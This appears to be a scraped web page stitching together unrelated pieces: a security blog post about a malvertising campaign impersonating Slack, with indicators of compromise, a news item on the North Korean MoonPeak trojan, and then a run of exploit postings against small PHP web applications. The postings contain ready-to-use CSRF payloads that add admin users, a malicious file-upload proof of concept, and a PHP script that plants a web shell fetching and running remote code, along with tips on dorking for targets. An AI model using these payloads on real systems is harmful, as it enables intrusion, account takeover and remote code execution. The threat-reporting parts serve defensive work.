Once again, threat actors seek out Google search ads for top software downloads, but this time they show a lot of patience and bring on evasion tricks.

In the past year alone, we have reported almost five hundred unique malvertising incidents related to Google search ads. While it can be difficult to attribute each incident to a specific threat actor, we usually notice similarities between campaigns.

Some malvertisers go to great lengths to bypass security controls, while others know they will get caught and are willing to burn their accounts and infrastructure. Having said that, we have generally observed stealthier attacks and the one we are covering in this blog is one of them.

Targeting the popular communication tool Slack, a threat actor is relying on several online tools to narrow down their victims’ list and most importantly evade detection.

**Context is everything**

For several days we noticed a suspicious ad for Slack that appeared when you googled the search term for it. The ad actually looks quite legitimate and is listed above the organic search result for the official site. Despite its appearance, we knew it was likely malicious, even though clicking on it at the time would only result in being redirected to slack.com.

Almost every Google ad contains additional information about its advertiser and why it was displayed to you. This is accessible by clicking on the 3 dots beside the ad URL and it brings you to the Google Ads Transparency Center. What we notice is that this advertiser is promoting products that look targeted at the Asian market, and then there’s this Slack ad that appears in the middle of nowhere.

We’ve mentioned before how contextualized detection could be a good way to identify an advertiser account that has been compromised. We don’t know whether Google’s algorithms are trained on this or not, but it has certainly helped us many times in the past to find new malicious ad campaigns.

**Slow cooking**

For days, clicking on this Slack ad would only redirect to a price page on Slack’s official website. Ads aren’t always weaponized right away; in fact it is a common practice for threat actors to let their ad ‘cook’ such that it does not immediately become detected.

Eventually, we saw a change in behavior. Rather than redirecting to slack.com, now the ad first started redirecting to a click tracker. This is one of the weaknesses in the Google ad ecosystem as such services can be abused to filter clicks and essentially send traffic to a domain of anyone’s choosing. Tracking templates as they are known, are a built-in feature that has become synonym with fraud for us.

**Playing games of hide and seek**

Now the ad’s final URL had become _slack-windows-download\[.\]com_ an interesting choice for a domain name created less than a week ago. While it is obvious that this page was automatically generated, perhaps using AI, there is nothing malicious on it. For whatever reason, the server side checks determined that we should only be seeing this decoy page at the time:

After tweaking various settings, we finally saw the malicious page, meant to impersonate Slack and offer a download link to unsuspecting victims. It is the same domain as the one above, but the content is completely different. That type of behavior is known as cloaking, where different users are shown different content:

Below is a network traffic capture showing what was required to get to this page. There are a few things worth noting:

*   The Google ad URL redirects to a click tracker, followed by another. There is no way for Google to know where users are going at this point.
*   The click trackers themselves are blinded on what happens next, thanks to a link shortener followed by one more cloaking domain.

This deep layering makes it incredibly difficult to evaluate an ad without resorting to specific tooling and knowledge of the threat actors’ TTPs.

**Malware payload**

The download button triggers a file download from another domain that may hint at a parallel campaign targeting Zoom. A key is passed to the server to request the malware binary to users who went through the delivery chain.

Dynamic analysis in a sandbox shows a remote connection to _45.141.87\[.\]218_, a server previously used by SecTopRAT, a remote access Trojan with stealer capabilities. This payload was previously dropped in other malvertising chains, one of them impersonating NordVPN.

**Conclusion**

Malwarebytes was already blocking that command and control server and we’ve improved our detection coverage by adding the supporting and delivery infrastructure used in this campaign. In addition, we’ve reported the malicious ad to Google and Cloudflare has now flagged the decoy domains that were abusing its services, as phishing.

We expect malvertisers to continue to exploit free and paid platforms to help them avoid detection, but we also should be aware that they may be more patient and wait for the right moment to unleash a new campaign.

**Indicators of Compromise**

Link redirect

slacklink\[.\]sng\[.\]link

Cloaking

haiersi\[.\]com

Decoy sites

slack-windows-download\[.\]com  
slack-download-for-windows\[.\]com

Payload download

zoom2024\[.\]online

Payload SHA256

59e5e07ffa53ad721bc6b4c2ef435e08ae5b1286cda51415303978da474032d2

 Fraudulent Slack ad shows malvertiser&#8217;s patience and skills 

A new remote access trojan called MoonPeak has been discovered as being used by a state-sponsored North Korean threat activity cluster as part of a new campaign.
Cisco Talos attributed the malicious cyber campaign to a hacking group it tracks as UAT-5394, which it said exhibits some level of tactical overlaps with a known nation-state actor codenamed Kimsuky.
MoonPeak, under active development

Cyber Espionage / Malware

A new remote access trojan called **MoonPeak** has been discovered as being used by a state-sponsored North Korean threat activity cluster as part of a new campaign.

Cisco Talos attributed the malicious cyber campaign to a hacking group it tracks as UAT-5394, which it said exhibits some level of tactical overlaps with a known nation-state actor codenamed Kimsuky.

MoonPeak, under active development by the threat actor, is a variant of the open-source Xeno RAT malware, which was previously deployed as part of phishing attacks that are designed to retrieve the payload from actor-controlled cloud services like Dropbox, Google Drive, and Microsoft OneDrive.

Some of the key features of Xeno RAT include the ability to load additional plugins, launch and terminate processes, and communicate with a command-and-control (C2) server.

Talos said the commonalities between the two intrusion sets either indicate UAT-5394 is actually Kimsuky (or its sub-group) or it's another hacking crew within the North Korean cyber apparatus that borrows its toolbox from Kimsuky.

Key to realizing the campaign is the use of new infrastructure, including C2 servers, payload-hosting sites, and test virtual machines, that have been created to spawn new iterations of MoonPeak.

"The C2 server hosts malicious artifacts for download, which is then used to access and set up new infrastructure to support this campaign," Talos researchers Asheer Malhotra, Guilherme Venere, and Vitor Ventura said in a Wednesday analysis.

"In multiple instances, we also observed the threat actor access existing servers to update their payloads and retrieve logs and information collected from MoonPeak infections."

The shift is seen as part of a broader pivot from using legitimate cloud storage providers to setting up their own servers. That said, the targets of the campaign are currently not known.

An important aspect to note here is that "the constant evolution of MoonPeak runs hand-in-hand with new infrastructure set up by the threat actors" and that each new version of the malware introduces more obfuscation techniques to thwart analysis and changes to the overall communication mechanism to prevent unauthorized connections.

"Simply put, the threat actors ensured that specific variants of MoonPeak only work with specific variants of the C2 server," the researchers pointed out.

"The timelines of the consistent adoption of new malware and its evolution such as in the case of MoonPeak highlights that UAT-5394 continues to add and enhance more tooling into their arsenal. The rapid pace of establishing new supporting infrastructure by UAT-5394 indicates that the group is aiming to rapidly proliferate this campaign and set up more drop points and C2 servers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Deploy New MoonPeak Trojan in Cyber Campaign

Online Diagnostic Lab Management System version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : Online Diagnostic Lab Management System v1.0 Remote File Upload Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : diagnostic/manage_website.php.[+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Upload Website Image</title></head><body>    <form action="http://127.0.0.1/diagnostic/manage_website.php" method="POST" enctype="multipart/form-data">        <label for="website_image">Upload Website Image:</label>        <input type="file" id="website_image" name="website_image" required>        <button type="submit" name="btn_web">Submit</button>    </form></body></html>[+] http://127.0.0.1/diagnostic/assets/uploadImage/Logo/webadmin.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Diagnostic Lab Management System 1.0 Arbitrary File Upload

Online Banking System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Online Banking System 1.0 CSRF Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip                                           |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

    FormData Object:

          The FormData object is created to hold the form's data, including the file upload.

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+]  Backend Requirements :

    The server-side script (Users.php) should be capable of handling the incoming POST request,   
  processing the form data (including saving the file), and returning an appropriate response.

    This form can be improved by adding additional client-side validations, better error handling,   
  and perhaps enhancing security measures, such as sanitizing inputs on the server side.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <label for="img">Avatar:</label>  
        <input type="file" id="img" name="img" accept="image/*"><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/banking/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Banking System 1.0 Cross Site Request Forgery

Music Gallery Site version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Music Gallery Site v1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/php-music/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name     "indoushka".

[+] Line 19 : Choose a password "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-music\/classes\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Music Gallery Site 1.0 Cross Site Request Forgery

Multi-Vendor Online Groceries Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability                                                      |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip                                          |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload add new admin user .

[+] save payload as poc.html 

[+] line 27 Set your target url

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Multi-Vendor Online Groceries Management System 1.0 Cross Site Request Forgery

Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 52.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Registration Form</title>    <style>        body {            font-family: Arial, sans-serif;            margin: 20px;            padding: 20px;            max-width: 600px;            background-color: #f4f4f4;            border-radius: 8px;        }        .form-container {            display: flex;            flex-direction: column;        }        .form-group {            margin-bottom: 15px;        }        .form-group label {            font-weight: bold;            margin-bottom: 5px;            display: block;        }        .form-group input, .form-group select {            padding: 8px;            width: 100%;            border: 1px solid #ccc;            border-radius: 4px;        }        .form-group select {            cursor: pointer;        }        .form-group button {            padding: 10px 15px;            background-color: #007bff;            color: white;            border: none;            cursor: pointer;            border-radius: 4px;        }        .form-group button:hover {            background-color: #0056b3;        }    </style></head><body>    <h2>Registration Form</h2>    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">        <div class="form-group">            <label for="firstname">First Name:</label>            <input type="text" id="firstname" name="firstname" required>        </div>        <div class="form-group">            <label for="nid">National ID (NID):</label>            <input type="text" id="nid" name="nid" required>        </div>        <div class="form-group">            <label for="gender">Gender:</label>            <select id="gender" name="gender" required>                <option value="">Select Gender</option>                <option value="male">Male</option>                <option value="female">Female</option>            </select>        </div>        <div class="form-group">            <label for="email">Email:</label>            <input type="email" id="email" name="email" required>        </div>        <div class="form-group">            <label for="phonenumber">Phone Number:</label>            <input type="text" id="phonenumber" name="phonenumber" required>        </div>        <div class="form-group">            <label for="jobs">Job:</label>            <select id="jobs" name="jobs" required>                <option value="">Select Job</option>                <option value="doctor">Doctor</option>                <option value="nurse">Nurse</option>                <option value="pharmacist">Pharmacist</option>            </select>        </div>        <div class="form-group">            <label for="province">Province:</label>            <select id="province" name="province" required>                <option value="">Select Province</option>                <option value="province1">Province 1</option>                <option value="province2">Province 2</option>                <option value="province3">Province 3</option>            </select>        </div>        <div class="form-group">            <label for="city">City:</label>            <select id="city" name="city" required>                <option value="">Select City</option>                <option value="city1">City 1</option>                <option value="city2">City 2</option>                <option value="city3">City 3</option>            </select>        </div>        <div class="form-group">            <label for="username">Username:</label>            <input type="text" id="username" name="username" required>        </div>        <div class="form-group">            <label for="password">Password:</label>            <input type="password" id="password" name="password" required>        </div>        <div class="form-group">            <button type="submit">Register</button>        </div>    </form></body></html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Medical Center Portal 1.0 Cross Site Request Forgery

Event Registration and Attendance System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Event Registration and Attendance System 1.0 CSRF Vulnerability                                                             |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip                                |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 27 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">User Name:</label>  
        <input type="username" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/news_portal/admin/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Event Registration and Attendance System 1.0 Cross Site Request Forgery

Cab Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : cab management system 1.0 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.  [+] Line 6 : Set your target url[+] Line 15+19 : Set your user & pass[+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/cms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Cab Management System 1.0 Cross Site Request Forgery

Alphaware E-Commerce System version 1.0 suffers from a code injection vulnerability.

    =============================================================================================================================================| # Title     : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.    combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            // Safely include the content of the remote PHP file            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'add' => '',        'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'product_name' => 'inouva',        'product_price' => '123',        'product_size' => '99',        'brand' => 'N0_name',        'category' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/alphaware/photo/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google